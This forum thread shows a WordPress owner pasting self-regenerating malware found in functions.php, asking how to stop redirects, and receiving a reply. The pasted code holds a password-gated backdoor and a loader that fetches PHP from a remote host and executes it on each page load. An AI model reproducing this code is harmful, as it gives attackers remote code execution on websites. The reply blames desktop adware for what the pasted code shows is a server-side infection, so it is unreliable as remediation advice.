GravityCode GravityCode - 28 days ago 16
PHP Question

WordPress site have been redirect my links to onclickads website

I dont know if this is the code of the onlickads
everytime when i click some links on my website it redirects me on onclickads.com links.

everytime i remove this code on my theme functions.php it will generate this code again and again.. when i check the original file of the theme functions this code is not included.

<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f82a07ebbdf814988becaa9c78ce0ffb'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';

if (isset($_REQUEST['newdomain']))
{

if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code8\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}

if ( ! function_exists( 'w1p_te1mp_se1tup' ) ) {
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
if ( ! is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
if($tmpcontent = @file_get_contents("http://www.dolsh.com/code8.php?i=".$path))
{

function w1p_te1mp_se1tup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), "w1p_te1mp_se1tup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
extract(w1p_te1mp_se1tup($tmpcontent));
}
}
}

?>


any one can suggest what to do or tuts to remove the malware on my website,

Thank You.

Answer Source

This onclickads.com redirect is usually caused by adware installed on your computer. These adware programs are bundled with other free software that you download off of the Internet.

Might be you don't need to install a fresh version and you can remove this type of cautions from your site with below steps.

To remove the onclickads.com redirect, follow these steps:

1) Removed unwanted code from your file.

2) Uninstall malicious programs from Windows

3) Use security software on your system and also use security plugin in your WordPress like Anti-spam or Wordfence

After following this steps still, nothing works then you can install a fresh version and install security plugin with your fresh one to avoid hacking in future use.

Hope this will helpful for you. Thanks.